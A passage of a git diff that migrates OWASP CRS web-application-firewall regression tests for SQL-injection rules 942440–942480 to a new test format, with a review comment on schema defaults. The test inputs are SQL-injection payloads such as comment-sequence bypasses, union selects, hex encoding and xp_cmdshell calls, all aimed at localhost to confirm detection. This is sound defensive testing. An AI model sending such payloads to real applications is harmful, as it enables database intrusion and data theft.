- port: 80 - version: "HTTP/1.0" - uri: "/post" - data: "test=SELECT /*!32302 1/0, */ 1 FROM tablename" - output: - log_contains: id "942440" - - test_title: 942440-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=SELECT /*!32302 1/0, */ 1 FROM tablename" + output: + log: + expect_ids: [942440] + - test_id: 9 desc: "SQL Comment Sequence" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "POST" - port: 80 - version: "HTTP/1.0" - uri: "/post" - data: "test=' or 1=1# " - output: - log_contains: id "942440" - - test_title: 942440-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=' or 1=1# " + output: + log: + expect_ids: [942440] + - test_id: 10 desc: "SQL Comment Sequence" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "POST" - port: 80 - version: "HTTP/1.0" - uri: "/post" - data: "test=‘ or 1=1-- -" - output: - log_contains: id "942440" - - test_title: 942440-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + 
uri: "/post" + data: "test=‘ or 1=1-- -" + output: + log: + expect_ids: [942440] + - test_id: 11 desc: "SQL Comment Sequence" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "POST" - port: 80 - version: "HTTP/1.0" - uri: "/post" - data: "test=‘ or 1=1/*" - output: - log_contains: id "942440" - - test_title: 942440-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=‘ or 1=1/*" + output: + log: + expect_ids: [942440] + - test_id: 12 desc: "SQL Comment Sequence" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "POST" - port: 80 - version: "HTTP/1.0" - uri: "/post" - data: "test=1='1' or-- -" - output: - log_contains: id "942440" - - test_title: 942440-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=1='1' or-- -" + output: + log: + expect_ids: [942440] + - test_id: 13 desc: "SQL Comment Sequence" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "POST" - port: 80 - version: "HTTP/1.0" - uri: "/post" - data: "test=' /*!50000or*/1='1" - 
output: - log_contains: id "942440" - - test_title: 942440-14 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=' /*!50000or*/1='1" + output: + log: + expect_ids: [942440] + - test_id: 14 desc: "SQL Comment Sequence" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "POST" - port: 80 - version: "HTTP/1.0" - uri: "/post" - data: "test=' /*!or*/1='1" - output: - log_contains: id "942440" - - test_title: 942440-15 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=' /*!or*/1='1" + output: + log: + expect_ids: [942440] + - test_id: 15 desc: "SQL Comment Sequence" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "POST" - port: 80 - version: "HTTP/1.0" - uri: "/post" - data: "test=0/**/union/*!50000select*/table_name`foo`/**/" - output: - log_contains: id "942440" - - test_title: 942440-16 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=0/**/union/*!50000select*/table_name`foo`/**/" + output: + log: 
+ expect_ids: [942440] + - test_id: 16 desc: "Avoid False Positive on JWT (body)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - method: "POST" - port: 80 - version: "HTTP/1.1" - uri: "/post" - data: "token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMe--KKF2QT4fwpMeJf36POk6yJV_adQssw-5c" - output: - no_log_contains: id "942440" - - test_title: 942440-17 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + method: "POST" + port: 80 + version: "HTTP/1.1" + uri: "/post" + data: "token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMe--KKF2QT4fwpMeJf36POk6yJV_adQssw-5c" + output: + log: + no_expect_ids: [942440] + - test_id: 17 desc: "Avoid False Positive on JWT (cookie)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Cookie: "token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMe--KKF2QT4fwpMeJf36POk6yJV_adQssw-5c" - method: "POST" - port: 80 - version: "HTTP/1.1" - uri: "/post" - data: "foo=bar" - output: - no_log_contains: id "942440" - - test_title: 942440-18 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Cookie: "token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMe--KKF2QT4fwpMeJf36POk6yJV_adQssw-5c" + method: "POST" + port: 80 + version: "HTTP/1.1" + uri: "/post" + data: "foo=bar" + output: + log: + no_expect_ids: [942440] + - test_id: 18 desc: "Avoid False Positive on JWT (querystring)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - method: "GET" - 
port: 80 - version: "HTTP/1.1" - uri: "/get/callback?token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMe--KKF2QT4fwpMeJf36POk6yJV_adQssw-5c" - output: - no_log_contains: id "942440" - - test_title: 942440-19 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + method: "GET" + port: 80 + version: "HTTP/1.1" + uri: "/get/callback?token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMe--KKF2QT4fwpMeJf36POk6yJV_adQssw-5c" + output: + log: + no_expect_ids: [942440] + - test_id: 19 desc: "False positive against Facebook click identifier" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - method: "GET" - port: 80 - version: "HTTP/1.1" - uri: "/get?fbclid=IwAR1dug0BYxe0ukhZ2vKrdQwLAxVFRJ--Q2Y7OBJE_0uId9-Eh-sJWLdVk2E" - output: - no_log_contains: id "942440" - - test_title: 942440-20 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + method: "GET" + port: 80 + version: "HTTP/1.1" + uri: "/get?fbclid=IwAR1dug0BYxe0ukhZ2vKrdQwLAxVFRJ--Q2Y7OBJE_0uId9-Eh-sJWLdVk2E" + output: + log: + no_expect_ids: [942440] + - test_id: 20 desc: "False positive against Google click identifier" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - method: "GET" - port: 80 - version: "HTTP/1.1" - uri: "/get?gclid=j0KCQiA1NebBhDDARIsAANiDD3_RJeMv8zScF--mC1jf8fO8PDYJCxD9xdwT7iQ59QIIwL-86ncQtMaAh0lEALw_wcB" - output: - no_log_contains: id "942440" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + method: "GET" + port: 80 + version: "HTTP/1.1" + uri: "/get?gclid=j0KCQiA1NebBhDDARIsAANiDD3_RJeMv8zScF--mC1jf8fO8PDYJCxD9xdwT7iQ59QIIwL-86ncQtMaAh0lEALw_wcB" + output: + log: + 
no_expect_ids: [942440] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942450.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942450.yaml index 7d3203112..bf0f304cd 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942450.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942450.yaml 
@@ -1,92 +1,90 @@ --- meta: author: "William Woodson, azurit" - description: None - enabled: true - name: 942450.yaml +rule_id: 942450 tests: - - test_title: 942450-1 + - test_id: 1 desc: "SQL Hex Encoding" stages: - - stage: - input: - dest_addr: 127.0.0.1 - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - uri: "/post" - data: "var=%5c0xf00dsdfdsa" - version: HTTP/1.0 - output: - log_contains: id "942450" - - test_title: 942450-2 + - input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/post" + data: "var=%5c0xf00dsdfdsa" + version: HTTP/1.0 + output: + log: + expect_ids: [942450] + - test_id: 2 desc: "SQL Hex Encoding" stages: - - stage: - input: - dest_addr: 127.0.0.1 - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - uri: "/post" - data: "var=concat%280x223e3c62723e%2Cversion%28%29%2C0x3c696d67207372633d22%29" - version: HTTP/1.0 - output: - log_contains: id "942450" - - test_title: 942450-3 + - input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/post" + data: "var=concat%280x223e3c62723e%2Cversion%28%29%2C0x3c696d67207372633d22%29" + version: HTTP/1.0 + output: + log: + expect_ids: [942450] + - test_id: 3 desc: "SQL Hex Encoding" stages: - - stage: - input: - dest_addr: 127.0.0.1 - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - uri: "/post" - data: "var=select%200x616263" - version: HTTP/1.0 - output: - log_contains: id "942450" - - test_title: 942450-4 + - input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/post" + data: "var=select%200x616263" + version: HTTP/1.0 + output: + log: + expect_ids: [942450] + - test_id: 4 desc: "SQL Hex Encoding - negative" stages: - - stage: - input: - dest_addr: 127.0.0.1 - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - uri: "/post" - data: "var=IHRlc3Q0xAcF" - version: HTTP/1.0 - output: - no_log_contains: id "942450" - - test_title: 942450-5 + - input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/post" + data: "var=IHRlc3Q0xAcF" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942450] + - test_id: 5 desc: "SQL Hex Encoding - negative" stages: - - stage: - input: - dest_addr: 127.0.0.1 - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - uri: "/post" - data: "var=9F86D081884C7D659A2FEAA0C55AD015A3BF4F1B2B0B822CD15D6C15B0F00A08" - version: HTTP/1.0 - output: - no_log_contains: id "942450" + - input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/post" + data: "var=9F86D081884C7D659A2FEAA0C55AD015A3BF4F1B2B0B822CD15D6C15B0F00A08" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942450] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942460.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942460.yaml index 7d99328e2..9a2b72a23 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942460.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942460.yaml 
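Review bot: The rewritten `meta` block drops `enabled: true` and keeps only `author`, relying on the loader's default for `enabled`; if go-ftw 1.0.3 does not treat a missing `meta.enabled` as enabled, every converted file would be skipped silently and CI would stay green without exercising the rule, so this is worth confirming once against the 1.0.3 schema. The same removal is made in the 942460, 942470, 942480 and 942490 hunks. A second, smaller point of style: `method: POST` and `version: HTTP/1.0` are plain scalars here and in 942460/942470/942480, while the 942440 file in the same commit quotes them (`method: "POST"`, `version: "HTTP/1.0"`); picking one form for the whole test tree would keep the files diffable and lint-clean.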
@@ -1,41 +1,39 @@ --- meta: author: "Franziska Bühler, azurit" - description: None - enabled: true - name: 942460.yaml +rule_id: 942460 tests: - - test_title: 942460-1 + - test_id: 1 desc: "Repetitive Non-Word Characters" stages: - - stage: - input: - dest_addr: 127.0.0.1 - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - uri: "/post" - data: "var=foo...." - version: HTTP/1.1 - output: - log_contains: id "942460" - - test_title: 942460-2 + - input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/post" + data: "var=foo...." + version: HTTP/1.1 + output: + log: + expect_ids: [942460] + - test_id: 2 desc: "Repetitive Non-Word Characters negative test only 3 characters" stages: - - stage: - input: - dest_addr: 127.0.0.1 - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - uri: "/post" - data: "var=foo..." - version: HTTP/1.1 - output: - no_log_contains: id "942460" + - input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/post" + data: "var=foo..." + version: HTTP/1.1 + output: + log: + no_expect_ids: [942460] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942470.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942470.yaml index e2b679c1a..3496a13e4 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942470.yaml 
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942470.yaml 
@@ -1,193 +1,191 @@ --- meta: author: "Christoph Hansen, azurit" - description: None - enabled: true - name: 942470.yaml +rule_id: 942470 tests: - - test_title: 942470-1 + - test_id: 1 desc: "SQL Injection Attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=nvarchar" - version: HTTP/1.0 - output: - log_contains: id "942470" - - test_title: 942470-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=nvarchar" + version: HTTP/1.0 + output: + log: + expect_ids: [942470] + - test_id: 2 desc: "SQL Injection Attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=xp_cmdshell" - version: HTTP/1.0 - output: - log_contains: id "942470" - - test_title: 942470-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=xp_cmdshell" + version: HTTP/1.0 + output: + log: + expect_ids: [942470] + - test_id: 3 desc: "SQL Injection Attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: 
"pay=varchar" - version: HTTP/1.0 - output: - log_contains: id "942470" - - test_title: 942470-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=varchar" + version: HTTP/1.0 + output: + log: + expect_ids: [942470] + - test_id: 4 desc: "SQL Injection Attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=xp_dirtree" - version: HTTP/1.0 - output: - log_contains: id "942470" - - test_title: 942470-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=xp_dirtree" + version: HTTP/1.0 + output: + log: + expect_ids: [942470] + - test_id: 5 desc: "SQL Injection Attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=xp_regread" - version: HTTP/1.0 - output: - log_contains: id "942470" - - test_title: 942470-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=xp_regread" + version: HTTP/1.0 + output: + log: + expect_ids: [942470] + - test_id: 6 desc: "SQL Injection Attack" stages: - - 
stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=sp_password" - version: HTTP/1.0 - output: - log_contains: id "942470" - - test_title: 942470-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=sp_password" + version: HTTP/1.0 + output: + log: + expect_ids: [942470] + - test_id: 7 desc: "SQL Injection Attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=UTL_HTTP" - version: HTTP/1.0 - output: - log_contains: id "942470" - - test_title: 942470-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=UTL_HTTP" + version: HTTP/1.0 + output: + log: + expect_ids: [942470] + - test_id: 8 desc: "SQL Injection Attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=OPENROWSET" - version: HTTP/1.0 - output: - log_contains: id "942470" - - test_title: 942470-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=OPENROWSET" + version: HTTP/1.0 + output: + log: + expect_ids: [942470] + - test_id: 9 desc: "SQL Injection Attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=sp_executesql" - version: HTTP/1.0 - output: - log_contains: id "942470" - - test_title: 942470-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=sp_executesql" + version: HTTP/1.0 + output: + log: + expect_ids: [942470] + - test_id: 10 desc: "SQL Injection Attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "sp_executesql" - version: HTTP/1.0 - output: - log_contains: id "942470" - - test_title: 942470-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "sp_executesql" + version: HTTP/1.0 + output: + log: + expect_ids: [942470] + - test_id: 11 desc: "SQL Injection Attack: current_user" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.php?id=1%2bcurrent_user::int" - version: HTTP/1.0 - output: - log_contains: id "942470" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.php?id=1%2bcurrent_user::int" + version: HTTP/1.0 + output: + log: + expect_ids: [942470] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942480.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942480.yaml index af47b1574..cf93c29b3 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942480.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942480.yaml 
@@ -1,211 +1,209 @@ --- meta: author: "Jose Nazario, azurit" - description: None - enabled: true - name: 942480.yaml +rule_id: 942480 tests: - - test_title: 942480-1 + - test_id: 1 desc: "SQL Injection Attack" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Host: "localhost" - Cache-Control: "no-cache, no-store, must-revalidate" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - # variable name boundary attacks - uri: "/get?'msdasql'" - version: HTTP/1.0 - output: - log_contains: "id \"942480" - - test_title: 942480-2 + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + Cache-Control: "no-cache, no-store, must-revalidate" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # variable name boundary attacks + uri: "/get?'msdasql'" + version: HTTP/1.0 + output: + log: + expect_ids: [942480] + - test_id: 2 desc: "SQL Injection Attack" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Host: "localhost" - Cache-Control: "no-cache, no-store, must-revalidate" - # variable name boundary attacks - Cookie: "'msdasql'" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - output: - log_contains: "id \"942480" - - test_title: 942480-3 + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + Cache-Control: "no-cache, no-store, must-revalidate" + # variable name boundary attacks + Cookie: "'msdasql'" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + output: + log: + 
